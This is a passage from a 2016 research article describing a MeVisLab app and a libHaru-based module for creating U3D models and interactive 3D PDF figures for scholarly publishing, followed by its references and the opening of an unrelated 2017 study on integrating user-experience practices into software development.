The software shall offer an option to specify the U3D object name of imported point sets. Deployment of core functionality For the creation of the actual PDF files, version 2.2.0 of the cross-platform, open source library libHaru (http://libharu.org/) was selected, slightly modified and integrated as third-party contribution into MeVisLab. Next, the application programming interface (API) of libHaru was wrapped into an abstract base module for MeVisLab in order to provide an easy access to all functions of the library and in order to hide away standard tasks like creating a document or releasing memory. A large number of convenience functions were added to this base module and an exemplary MeVisLab project was set up in order to demonstrate how to use the base module for tailored applications. This base module also served as basis for the PDF creation of the app macro described above. Finally, a project wizard was integrated into the MeVisLab GUI. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 7/20 https://peerj.com http://libharu.org/ http://dx.doi.org/10.7717/peerj-cs.64 Figure 2 User interface of the app. The user interface comprises all necessary steps for the creation of 3D model files and PDF files. It is arranged in tabs for each step. RESULTS The “Scientific3DFigurePDFApp” module The new macro module ‘‘Scientific3DFigurePDFApp’’ for MeVisLab provides an integrated user interface for all steps that are necessary for the creation of U3D model files and for the creation of the final PDF documents with embedded 3D models. The model editor part produces U3D model files of geometry data that are compatible with version 4 of the ECMA-363 standard and poster images in Portable Network Graphics (PNG) format. The PDF editor part produces PDF documents that are compliant with PDF version 1.7 (ISO 32000-1:2008). An example PDF is available as File S1. The user interface is arranged in tabs, whereas each tab comprises all functions for one step of the workflow. By processing the tabs consecutively, the user can assemble and modify 3D models, save them in U3D format, create views and poster images for the PDF document, and finally create the PDF itself step by step (Fig. 2). The raw model data can be collected in two ways: either by feeding it to the input connectors or by assembling it by means of the built-in assistant. The former option is intended for experienced MeVisLab users that want to attach the module at the end of a processing chain. The latter option addresses users that simply want to apply the app for converting existing 3D models and for creating an interactive figure for scholar publishing. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64/supp-1 http://dx.doi.org/10.7717/peerj-cs.64 Table 3 List of supported 3D formats for importing geometry data (textures, animations and other features are not supported). File format Typical file extension(s) Stereolithography *.stl Stanford Polygon Library *.ply Wavefront Object *.obj Object File Format *.off Blender *.blend Raw Triangles *.raw Raw Point Clouds *.csv; *.txt Raw Line Sets *.csv; *.txt 3D GameStudio *.mdl; *.hmp 3D Studio Max *.3ds; *.ase AC3D *.ac AutoCAD/Autodesk *.dxf Biovision BVH *.bvh CharacterStudio Motion *.csm Collada *.dae; *.xml DirectX X *.x Doom 3 *.md5mesh; *.md5anim; *.md5camera Irrlicht *.irrmesh; *.irr; *.xml LightWave *.lwo; *.lws Milkshape 3D *.ms3d Modo Model *.lxo Neutral File Format *.nff Ogre *.mesh.xml; *.skeleton.xml; *.material Quake I, Quake II, Quake III *.mdl; *.md2; *.md3; *.pk3 Quick3D *.q3o; *q3s RtCW *.mdc Sense8 WorldToolkit *.nff Terragen Terrain *.ter TrueSpace *.cob; *.scn Valve Model *.smd; *.vta XGL *.xgl; *.zgl The software allows for importing the geometry data of 39 different 3D formats, including point clouds and line sets from files in character-separated value (CSV) format (see Table 3 for a full list). The import of textures and animations is not supported. Objects from different sources can be combined and their U3D properties (colour, name, position in the object tree) can be specified. The density of imported meshes can be adjusted interactively and multiple views (i.e., the specification of camera, lighting and render mode) can be pre-defined interactively as well. Finally, it is also possible to create a poster image which can replace an inactive 3D model in the PDF document if the model itself is disabled or if it cannot be displayed for some reason (e.g., because the reading software does not provide the necessary features). Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 9/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64 Table 4 List of features. Category Features Data import Import external data, import MeVisLab data, import point clouds, import line sets, import meshes from 37 file formats, adjust mesh density, preview import Point cloud editing Specify point cloud name, specify position in model tree, preview settings Line set editing Specify line set name, specify position in model tree, specify colour, preview settings Mesh editing Specify mesh name, specify position in model tree, specify colour, specify opacity, preview settings View specification Specify view name, specify background colour, specify lighting scheme, specify render mode, preview settings, specify multiple views U3D creation Store model in U3D format, preview scene Poster image creation Store poster in PNG format, preview scene, specify superimposed text PDF creation Store document in PDF (v1.7) format, specify header citation text, specify header headline text, specify U3D file, specify poster file, specify model activation mode, specify model deactivation mode, specify toolbar enabling, specify navigation bar enabling, specify animation start mode, specify caption, specify description text All functions are explained in detail in a comprehensive documentation which can be accessed directly inside MeVisLab. A stand-alone copy of the documentation is available as File S2. In order to use the app, it simply needs to be instantiated (via the MeVisLab menu: Modules → PDF → Apps → Scientific3DFigurePDFApp). A full feature list is available in Table 4. Additional features for tailored PDF creation The abstract module which wraps the API of the PDF library libHaru into a MeVisLab module was made public (‘‘PDFGenerator’’ module) and can be used for the development of tailored MeVisLab modules. In order to facilitate the re-use of this abstract base module, an exemplary project was set up (/Projects/PDFExamples/SavePDFTemplate). This project demonstrates how to derive a customized module from the PDFGenerator base module and how to specify the content of the PDF file that will be created by means of the new module. The template code is verbosely annotated and includes examples for setting PDF properties (e.g., meta data, page size, encryption) as well as the document content (including text, images, graphics and 3D models). The output of the SavePDFTemplate module is illustrated in Fig. 3. Finally, a project wizard was integrated into the MeVisLab GUI. It can be accessed via the MeVisLab menu: File → Run Project Wizard...→ PDF Module. The wizard consists of three steps (Fig. 4) whereof the second step offers the possibility to include demo code which produces the same PDF file as the SavePDFTemplate module described above. The general usage of project wizards in MeVisLab is explained in chapter 23 of the MeVisLab Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64/supp-2 http://dx.doi.org/10.7717/peerj-cs.64 Figure 3 Output of the SavePDFTemplate module. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 11/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64 Figure 4 Project wizard for creating customized PDF modules. manual (menu: Help → Browse Help Pages → Using MeVisLab → MeVisLab Reference Manual). Availability The whole PDF project for MeVisLab (which includes the Scientific3DFigurePDFApp, the PDFGenerator base module, the SavePDFTemplate project, the project wizard and all source code files) is available for Microsoft Windows, MacOS and Linux (tested with Ubuntu 14.04.2). It requires MeVisLab 2.8 or a later version (http://www.mevislab.de/download/). The Windows version of MeVisLab is available for four compiler versions. This is relevant only if the source code is intended to be compiled manually (see below). There are two approaches to add the app and the other elements to an existing MeVisLab installation: add-on installers and the online repository of the MeVisLab community sources. Installers are self-contained, executable archives that automatically add all necessary files to an existing MeVisLab installation. The target groups for these installers are MeVisLab newcomers and pure users that want to use the Scientific3DFigurePDFApp out-of-the-box. The current version of the installers for all operating systems and all 64-Bit compiler versions can be downloaded from the research data repository Zenodo (10.5281/zenodo.48758). Installers for the previous version of MeVisLab (2.7.1) are available as well (10.5281/zenodo.47491), but this version will not be supported in the future. Updates will be made available via Zenodo as well. A dedicated Zenodo Community Collection named ‘‘Three-dimensional Portable Document Format (3D PDF) in Science’’ has been set up for this purpose (https://zenodo.org/collection/user-3d-pdf). All those who are interested in being able to always use the latest version should connect their MeVisLab installation with the community sources which are hosted at GitHub (https://github.com/MeVisLab/communitymodules/tree/master/Community). This approach, however, requires compiling the source code and is intended only for experienced users or for users that are willing to become acquainted with MeVisLab. Note Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 12/20 https://peerj.com http://www.mevislab.de/download/ http://dx.doi.org/10.5281/zenodo.48758 http://dx.doi.org/10.5281/zenodo.47491 https://zenodo.org/collection/user-3d-pdf https://github.com/MeVisLab/communitymodules/tree/master/Community http://dx.doi.org/10.7717/peerj-cs.64 that there are multiple versions available for Windows, depending on the compiler that is intended to be used. DISCUSSION A toolbox for the creation of 3D PDFs The utilization of 3D PDF technology for scholarly publishing has been revealed and proven both useful and necessary by several authors in the past years. The mainstream application of 3D PDF in science, however, is yet to come. One reason might be the difficult process that has so far been necessary to create appropriate data and relevant electronic documents. This article presents an all-in-one solution for the creation of such files which requires no extraordinary skills. It can be used by low-end users as an out-of-the-box tool as well as a basis for sophisticated tailored solutions for high-end users. Many typical problems as regards the creation of 3D model files have been addressed and solved. All steps of the workflow are integrated seamlessly. The software is available for all OS platforms and can import and process objects from many popular 3D formats, including polylines and point clouds (Table 3). The density of imported meshes can be adjusted interactively which enables the user to find the best balance between the desired level of detail and the file size. The main contribution, however, is the possibility to create ready-to-publish PDF documents with a minimum of steps. This approach was proposed to be the ideal solution by Kumar et al. (2010). To best knowledge, this is the first time that such an integrated and comprehensive solution is made available for the scientific community. Applications The areas of application (see an example in File S1) are manifold and not limited to a specific scientific discipline. On the contrary: every field of research that produces three-dimensional data can and should harness this technology in order to get the best out of that data. One (arbitrary) example for the possible use of mesh models from the recent literature is 3D ultrasound. Dahdouh et al. (2015) recently published about the results of segmentation of obstetric 3D ultrasound images. That article contains several figures that project three- dimensional models on the available two-dimensional surface. A presentation in native 3D would have enabled the reader to interactively explore the whole models instead of just one pre-defined snapshot. Another example is the visualization of molecular structures as demonstrated by Kumar et al. (2008). Polylines can be used to illustrate nervous fibre tracking. Mitter et al., (2015) used 2D projections of association fibres in the foetal brain to visualize their results. A real 3D visualization would have been very helpful in this case as well: while some basic knowledge about a depicted object helps to understand 2D projections of 3D structures, the possibility to preserve at least a little depth perception decreases with an increasing level of abstraction (mesh objects vs. polylines). Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64/supp-1 http://dx.doi.org/10.7717/peerj-cs.64 This particularly applies to point clouds which can be observed, for example, in an article by Qin et al. (2015): although these authors added three-dimensional axes to their figure (no. 6) it is still hard to get an impression of depth and therefore of the real position of the points in 3D space. Limitations Although the presented software pulls down the major thresholds that impede the creation of interactive figures for scholarly publishing, some limitations still need to be considered. A general concern is the suitability of PDF as a means to visualize and to exchange 3D models. PDF and U3D (or PRC) do not support all features that other modern 3D formats provide and that would be of interest for the scientific community (e.g., volumetric models). On the other hand, PDF is commonly accepted and de-facto the only file format that is used for the electronic exchange of scholarly articles. Therefore, PDF may not be the perfect solution, but it is the best solution that is currently available. The presented software requires MeVisLab as background framework and the installation of MeVisLab requires a medium-sized download of about 1 GB (depending on the operating system), which could be considered rather large for a PDF creator. On the other hand, MeVisLab integrates a large library for the processing and the visualization of (biomedical) image data. Furthermore, other frameworks (like MeshLab) do not provide all necessary features (e.g., polylines or point clouds) and therefore were not considered to meet basic requirements for the development of the software tool. The import of 3D models is based on the Open Asset Import Library (http: //www.assimp.org/) which does not support all features of all 3D formats. For example, textures and animations cannot be imported and should thus not be embedded into a model file that is intended to be imported. However, although the model-editor part of the presented software does not support textures (or animations), the PDF-creator part can still be used to produce scientific PDFs with textured or animated models, if the necessary U3D files have been created with external and more specialized software. In this use case, the Scientific3DFigurePDFApp does not integrate all necessary steps, but it still remains a ‘‘few-clicks’’ alternative for the creation of interactive PDF supplements for scientific publications and it still obviates the need for a commercial solution. Finally, very large model files should be avoided. If a large model fails to import, it should be separated into several sub-models. A mesh reduction can be applied after the import, but a previously reduced mesh speeds up the import process. Suitable reading software The Adobe Reader (http://get.adobe.com/reader/otherversions/) is available free of charge for all major operating systems (MS Windows, Mac OS, Linux). It is currently the only software that can be used to display embedded 3D models and to let the user interact with them (zooming, panning, rotating, selection of components). However, even the Adobe Reader does not support all U3D features (Adobe, 2007), e.g., Glyphs and View Nodes. Furthermore, a rendering flaw has been observed on low-end graphic boards in MacOS hardware (Fig. 5). Adobe Reader for MacOS does not render transparent surfaces Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 14/20 https://peerj.com http://www.assimp.org/ http://www.assimp.org/ http://get.adobe.com/reader/otherversions/ http://dx.doi.org/10.7717/peerj-cs.64 Figure 5 Rendering artifacts. These tessellation artifacts have been observed on MacOS systems with low-end graphic hardware. superimposed upon each other correctly: instead, a strong tessellation effect is visible. This may also occur on other platforms but has not been reported yet. Since this is an issue with the rendering engine of Adobe Reader, there is currently no other solution than using a different render mode (e.g., one of the wireframe modes) or different hardware. Experience shows that many users do not expect a PDF document to be interactive. Therefore, possible consumers should be notified that it is possible to interact with the document and they should also be notified that the original Adobe Reader is required for this. Although poster images are a workaround to avoid free areas in PDF readers that are not capable of rendering 3D scenes, missing 3D features of a certain reader could be confusing for a user. A basis for own modules As pointed out in previous work (Newe, 2015), the authoring of a PDF document is usually a complex task and thus in most cases it cannot be avoided to separate the generation of 3D model data from the actual PDF authoring. Although the software tool presented in this article mitigates this general problem by integrating model generation and PDF creation, it is still limited to a certain use case and a pre-defined PDF layout. However, the API of the core PDF functionality is public and designed in a way that facilitates the creation of own PDF export modules. The large number of convenience functions for the abstract base module (PDFGenerator) facilitates the creation of derived modules. These functions massively lighten the programmer’s workload by providing a simple access to routine tasks like writing text at a defined position or like embedding a 3D model which would normally require a whole series of API calls. Finally, the built-in Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64 wizard generates all necessary project files and source code files to create a fully functional module barebone which only needs to be outfitted with the desired functionality. Outlook Although this article represents an important milestone, the development of the PDF project for MeVisLab is ongoing. Future goals are the integration of virtual volume rendering (Barnes et al., 2013), animations (Van de Kamp et al., 2014) and the parsing of U3D files that have been created with external software. The progress can be tracked via GitHub (https://github.com/MeVisLab/communitymodules/tree/master/Community) and updates to the binary files will be published regularly. CONCLUSION Three-dimensional data is produced at an increasing rate throughout all scientific disciplines. The Portable Document Format is a well-suited medium for the visualization and the publication of this kind of data. With the software presented in this article, the complete workflow for generating 3D model files and 3D PDF documents for scholarly publications can be processed in a consolidated working environment, free of license costs and with all major operating systems. The software addresses novices as well as experienced users: on the one hand, it provides an out-of-the-box solution that can be used like a stand-alone application, and on the other hand, all sources and APIs are freely available for specifically tailored extensions. List of abbreviations 2D Two-dimensional 3D Three-dimensional PDF Portable Document Format ISO International Organization for Standardization U3D Universal 3D PRC Product Representation Compact CAD Computer Aided Construction ECMA European Computer Manufacturers Association GUI Graphical User Interface API Application Programming Interface PNG Portable Network Graphics CSV Character-separated Value, Comma-separated Value ACKNOWLEDGEMENTS Thanks to Dr. Hans Meine, Fraunhofer MEVIS, Bremen, Germany, for compiling the code for MacOS and Linux and for building installers. Thanks to Dr. Thomas van de Kamp, Karlsruhe Institute of Technology, Karlsruhe, Germany, for providing test data. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 16/20 https://peerj.com https://github.com/MeVisLab/communitymodules/tree/master/Community http://dx.doi.org/10.7717/peerj-cs.64 ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests The author declares there is no competing interests. Author Contributions • Axel Newe conceived and designed the experiments, contributed reagents/materials/anal- ysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, implemented the software. Data Availability The following information was supplied regarding data availability: https://github.com/MeVisLab/communitymodules/tree/master/Community/General; 10.5281/zenodo.48758; 10.5281/zenodo.47491. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.64#supplemental-information. REFERENCES Adobe Systems Incorporated (Adobe) 2004. Pdf reference, fifth edition, adobe portable document format, version 1.6. Available at http://wwwimages.adobe.com/content/ dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_archives/PDFReference16.pdf (accessed 1 May 2016). Archived at http://www.webcitation.org/6gUnINDkD. Adobe Systems Incorporated (Adobe) 2005. Adobe announces Acrobat 7.0 software availability. Available at https://www.adobe.com/aboutadobe/pressroom/pressreleases/ 200501/010505Acrobat.html (accessed 1 May 2016). Archived at http://www. webcitation.org/6gUnQPxOe. Adobe Systems Incorporated (Adobe) 2007. U3D supported elements. Available at http: //www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/U3DElements.pdf (accessed 1 May 2016). Archived at http://www.webcitation.org/6eU07DNbj. Adobe Systems Incorporated (Adobe) 2008a. Document management—portable document format—part 1: PDF 1.7. Available at http://wwwimages.adobe.com/ content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf (accessed 1 May 2016). Archived at http://www.webcitation.org/6S8xkrvPw. Adobe Systems Incorporated (Adobe) 2008b. Adobe R© supplement to the ISO 32000, BaseVersion: 1.7, ExtensionLevel: 3. Available at http://wwwimages.adobe.com/ content/dam/Adobe/en/devnet/pdf/pdfs/adobe_supplement_iso32000.pdf (accessed 1 May 2016). Archived at http://www.webcitation.org/6gUnW4iyd. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 17/20 https://peerj.com https://github.com/MeVisLab/communitymodules/tree/master/Community/General http://dx.doi.org/10.5281/zenodo.48758 http://dx.doi.org/10.5281/zenodo.47491 http://dx.doi.org/10.7717/peerj-cs.64#supplemental-information http://dx.doi.org/10.7717/peerj-cs.64#supplemental-information http://wwwimages.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_archives/PDFReference16.pdf http://wwwimages.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/pdf_reference_archives/PDFReference16.pdf http://www.webcitation.org/6gUnINDkD https://www.adobe.com/aboutadobe/pressroom/pressreleases/200501/010505Acrobat.html https://www.adobe.com/aboutadobe/pressroom/pressreleases/200501/010505Acrobat.html http://www.webcitation.org/6gUnQPxOe http://www.webcitation.org/6gUnQPxOe http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/U3DElements.pdf http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/U3DElements.pdf http://www.webcitation.org/6eU07DNbj http://wwwimages.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf http://wwwimages.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf http://www.webcitation.org/6S8xkrvPw http://wwwimages.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/adobe_supplement_iso32000.pdf http://wwwimages.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/adobe_supplement_iso32000.pdf http://www.webcitation.org/6gUnW4iyd http://dx.doi.org/10.7717/peerj-cs.64 Adobe Systems Incorporated (Adobe) 2014. Adobe—PDF: the global standard for trusted, electronic documents and forms. Available at http://www.adobe.com/au/ pdf/about/history/ (accessed 1 May 2016). Archived at http://www.webcitation.org/ 6eTx1aRad. Adobe Systems Incorporated (Adobe) 2015. PDF reference and Adobe extensions to the PDF specification. Available at http://www.adobe.com/devnet/pdf/pdf_reference.edu. html (accessed 1 May 2016). Archived at http://www.webcitation.org/6S8y0ShjG. Barnes DG, Fluke CJ. 2008. Incorporating interactive 3-dimensional graphics in astronomy research papers. New Astronomy 13(8):599–605 DOI 10.1016/j.newast.2008.03.008. Barnes DG, Vidiassov M, Ruthensteiner B, Fluke CJ, Quayle MR, McHenry CR. 2013. Embedding and publishing interactive, 3-dimensional, scientificfigures in Portable Document Format (PDF) files. PLoS ONE 8(9):e69446 DOI 10.1371/journal.pone.0069446. Bitter I, Van Uitert R, Wolf I, Ibanez L, Kuhnigk JM. 2007. Comparison of four freely available frameworks for image processing and visualization that use ITK. IEEE Transactions on Visualization and Computer Graphics 13(3):483–493 DOI 10.1109/TVCG.2007.1001. Dahdouh S, Angelini ED, Grangé G, Bloch I. 2015. Segmentation of embryonic and fetal 3D ultrasound images based on pixel intensity distributions and shape priors. Medical Image Analysis 24(1):255–268 DOI 10.1016/j.media.2014.12.005. Danz JC, Katsaros C. 2011. Three-dimensional portable document format: a sim- ple way to present 3-dimensional data in an electronic publication. Amer- ican Journal of Orthodontics and Dentofacial Orthopedics 140(2):274–276 DOI 10.1016/j.ajodo.2011.04.010. ECMA International (ECMA). 2007. Standard ECMA-363, universal 3D file format, 4th edition (June 2007). Available at Available at http://www.ecma-international.org/cgi- bin/counters/unicounter.pl?na%me=ECMA-363_4thedition&deliver=http://www. ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition. pdf (accessed 1 May 2016). Archived at: Available at http://www.webcitation.org/ 6QkI44nqn. Elsevier. 2015. Interactive U3D models. Available at http://www.elsevier.com/about/ content-innovation/u3d-models (accessed 1 May 2016). Archived at http://www. webcitation.org/6eTxA8hgV . Grahn A. 2005. The movie15 package. Available at http://solar.physics.montana.edu/ kankel/ph567/resources/LaTeX/graphics-animations/movie15.pdf (accessed 1 May 2016). Archived at http://www.webcitation.org/6eTzfqj6v. Heckel F, Schwier M, Peitgen HO. 2009. Object oriented application development with MeVisLab and Python. In: Lecture notes in informatics (Informatik 2009: Im Focus das Leben). Bonn: Gesellschaft fuer Informatik, 1338–1351. Hugh-Jones P. 1955. Diabetes in Jamaica. The Lancet 266(6896):891–897 DOI 10.1016/S0140-6736(55)92530-7. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 18/20 https://peerj.com http://www.adobe.com/au/pdf/about/history/ http://www.adobe.com/au/pdf/about/history/ http://www.webcitation.org/6eTx1aRad http://www.webcitation.org/6eTx1aRad http://www.adobe.com/devnet/pdf/pdf_ reference.edu.html http://www.adobe.com/devnet/pdf/pdf_ reference.edu.html http://www.webcitation.org/6S8y0ShjG http://dx.doi.org/10.1016/j.newast.2008.03.008 http://dx.doi.org/10.1371/journal.pone.0069446 http://dx.doi.org/10.1109/TVCG.2007.1001 http://dx.doi.org/10.1109/TVCG.2007.1001 http://dx.doi.org/10.1016/j.media.2014.12.005 http://dx.doi.org/10.1016/j.ajodo.2011.04.010 http://dx.doi.org/10.1016/j.ajodo.2011.04.010 http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ECMA-363_4thedition&deliver=http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ECMA-363_4thedition&deliver=http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ECMA-363_4thedition&deliver=http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ECMA-363_4thedition&deliver=http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition.pdf http://www.webcitation.org/6QkI44nqn http://www.webcitation.org/6QkI44nqn http://www.elsevier.com/about/content-innovation/u3d-models http://www.elsevier.com/about/content-innovation/u3d-models http://www.webcitation.org/6eTxA8hgV http://www.webcitation.org/6eTxA8hgV http://solar.physics.montana.edu/kankel/ph567/resources/LaTeX/graphics-animations/movie15.pdf http://solar.physics.montana.edu/kankel/ph567/resources/LaTeX/graphics-animations/movie15.pdf http://www.webcitation.org/6eTzfqj6v http://dx.doi.org/10.1016/S0140-6736(55)92530-7 http://dx.doi.org/10.7717/peerj-cs.64 Hurd JM. 2000. The transformation of scientific communication: a model for 2020. Jour- nal of the American Society for Information Science and Technology 51(14):1279–1283 DOI 10.1002/1097-4571(2000)9999:99993.0.CO;2-1. International Organization for Standardization (ISO). 2008. ISO 32000-1:2008 document management—portable document format—part 1: PDF 1.7. Available at http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumbe= 51502 (accessed 1 May 2016). Archived at http://www.webcitation.org/6QkFZgVk9. International Organization for Standardization (ISO). 2014. ISO/DIS 32000-2 review guide. Available at http://www.pdfa.org/wp-content/uploads/2014/09/ISO-32000- 2_DIS-1_REVIEW_ONLY.pdf (accessed 1 May 2016). Archived at http://www. webcitation.org/6byQJVKAs. Koenig M, Spindler W, Rexilius J, Jomier J, Link F, Peitgen HO. 2006. Embedding VTK and ITK into a visual programming and rapid prototyping platform. In: Proceedings of SPIE, medical imaging 2006: visualization, image-guided procedures, and display. Bellingham: SPIE. Krause DW, Wible JR, Hoffmann S, Groenke JR, O’Connor PM, Holloway WL, Rossie JB. 2014. Craniofacial morphology of vintana sertichi (Mammalia, Gondwanathe- ria) from the late cretaceous of Madagascar. Journal of Vertebrate Paleontology 34(Supplement 1):14–109 DOI 10.1080/02724634.2014.976129. Kumar P, Ziegler A, Grahn A, Hee CS, Ziegler A. 2010. Leaving the structural ivory tower, assisted by interactive 3D PDF. Trends in Biochemical Sciences 35(8):419–422 DOI 10.1016/j.tibs.2010.03.008. Kumar P, Ziegler A, Ziegler J, Uchanska-Ziegler B, Ziegler A. 2008. Grasping molecular structures through publication-integrated 3D models. Trends in Biochemical Sciences 33(9):408–412 DOI 10.1016/j.tibs.2008.06.004. Lautenschlager S. 2014. Palaeontology in the third dimension: a comprehensive guide for the integration of three-dimensional content in publications. Paläontologische Zeitschrift 88(1):111–121 DOI 10.1007/s12542-013-0184-2. Maunsell J. 2010. Announcement regarding supplemental material. Journal of Neuro- science 30(32):10599–10600. Mitter C, Prayer D, Brugger PC, Weber M, Kasprian G. 2015. In vivo tractography of fetal association. PLoS ONE 10(3):e0119536 DOI 10.1371/journal.pone.0119536. Newe A. 2015. Towards an easier creation of three-dimensional data for embedding into scholarly 3D PDF (Portable Document Format) files. PeerJ 3:e794 DOI 10.7717/peerj.794. Newe A, Becker L, Schenk A. 2014. Application and evaluation of interactive 3D PDF for presenting and sharing planning results for liver surgery in clinical routine. PLoS ONE 9(12):e115697 DOI 10.1371/journal.pone.0115697. Newe A, Ganslandt T. 2013. Simplified generation of biomedical 3D surface model data forembedding into 3D Portable Document Format (PDF) files for publication and education. PLoS ONE 8(11):e79004 DOI 10.1371/journal.pone.0079004. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 19/20 https://peerj.com http://dx.doi.org/10.1002/1097-4571(2000)9999:99993.0.CO;2-1 http://dx.doi.org/10.1002/1097-4571(2000)9999:99993.0.CO;2-1 http://www.iso.org/iso/iso_ catalogue/catalogue_tc/catalogue_detail.htm?csnumber=51502 http://www.iso.org/iso/iso_ catalogue/catalogue_tc/catalogue_detail.htm?csnumber=51502 http://www.webcitation.org/6QkFZgVk9 http://www.pdfa.org/wp-content/uploads/2014/09/ISO-32000-2_DIS-1_ REVIEW_ ONLY.pdf http://www.pdfa.org/wp-content/uploads/2014/09/ISO-32000-2_DIS-1_ REVIEW_ ONLY.pdf http://www.webcitation.org/6byQJVKAs http://www.webcitation.org/6byQJVKAs http://dx.doi.org/10.1080/02724634.2014.976129 http://dx.doi.org/10.1016/j.tibs.2010.03.008 http://dx.doi.org/10.1016/j.tibs.2010.03.008 http://dx.doi.org/10.1016/j.tibs.2008.06.004 http://dx.doi.org/10.1007/s12542-013-0184-2 http://dx.doi.org/10.1371/journal.pone.0119536 http://dx.doi.org/10.7717/peerj.794 http://dx.doi.org/10.1371/journal.pone.0115697 http://dx.doi.org/10.1371/journal.pone.0079004 http://dx.doi.org/10.7717/peerj-cs.64 Phelps A, Naeger DM, Marcovici P. 2012. Embedding 3D radiology models in portable document format. American Journal of Roentgenology 199(6):1342–1344 DOI 10.2214/AJR.12.8716. Qin Y, Yao W, Vu TT, Li S, Niu Z, Ban Y. 2015. Characterizing radiometric attributes of point cloud using anormalized reflective factor derived from small footprint LiDAR waveform. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing 8(2):740–749 DOI 10.1109/JSTARS.2014.2354014. Ritter F, Boskamp T, Homeyer A, Laue H, Schwier M, Link F, Peitgen HO. 2011. Medical image analysis. IEEE Pulse 2(6):60–70 DOI 10.1109/MPUL.2011.942929. Ruthensteiner B, Heß M. 2008. Embedding 3D models of biological specimens in PDF publications. Microscopy Research and Technique 71(11):778–786 DOI 10.1002/jemt.20618. Thoma GR, Ford G, Antani S, Demner-Fushman D, Chung M, Simpson M. 2010. Interactive publication: the document as a research tool. Web Semantics 8(2– 3):145–150 DOI 10.1016/j.websem.2010.04.001. Tory M, Möller T. 2004. Human factors in visualization research. IEEE Transactions on Visualization and Computer Graphics 10(1):72–84 DOI 10.1109/TVCG.2004.1260759. Van de Kamp T, Dos Santos Rolo T, Vagovic P, Baumbach T, Riedel A. 2014. Three- dimensional reconstructions come to life—interactive 3D PDF animations in func- tional morphology. PLoS ONE 9(7):e102355 DOI 10.1371/journal.pone.0102355. Zlatanova S, Verbree E. 2005. The third dimension in LBS: the steps to go. In: Pro- ceedings of the 3rd symposium on location based services & telecartography, 28–30 November 2005, Vienna, Austria, 185–190. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 20/20 https://peerj.com http://dx.doi.org/10.2214/AJR.12.8716 http://dx.doi.org/10.2214/AJR.12.8716 http://dx.doi.org/10.1109/JSTARS.2014.2354014 http://dx.doi.org/10.1109/MPUL.2011.942929 http://dx.doi.org/10.1002/jemt.20618 http://dx.doi.org/10.1002/jemt.20618 http://dx.doi.org/10.1016/j.websem.2010.04.001 http://dx.doi.org/10.1109/TVCG.2004.1260759 http://dx.doi.org/10.1371/journal.pone.0102355 http://dx.doi.org/10.7717/peerj-cs.64 work_cxgelzja2ve7blgq5bwv2zoshy ---- Submitted 11 May 2016 Accepted 1 August 2017 Published 16 October 2017 Corresponding author Pariya Kashfi, pariya.kashfi@chalmers.se, p@puix.org Academic editor James Procter Additional Information and Declarations can be found on page 36 DOI 10.7717/peerj-cs.130 Copyright 2017 Kashfi et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Integrating User eXperience practices into software development processes: implications of the UX characteristics Pariya Kashfi, Agneta Nilsson and Robert Feldt Department of Computer Science and Engineering, Chalmers University of Technology and Gothenburg University, Gothenburg, Sweden ABSTRACT User eXperience (UX) is a key factor in the success of software systems. Many software companies face challenges in their work with UX. Existing research does not analyze UX practices and challenges in relation to other software quality characteristics or, in particular, in relation to usability. A better understanding of these challenges can help researchers and practitioners better address them in the future. In this empirical study, we have interviewed 17 practitioners with different backgrounds and occupations from eight software development companies. Their responses are coded, and analyzed with thematic analysis. We report eight themes of challenges that practitioners face in their work with UX. While some of these challenges partly overlap with those reported in existing literature about usability or other software quality characteristics, the participants of our study either view 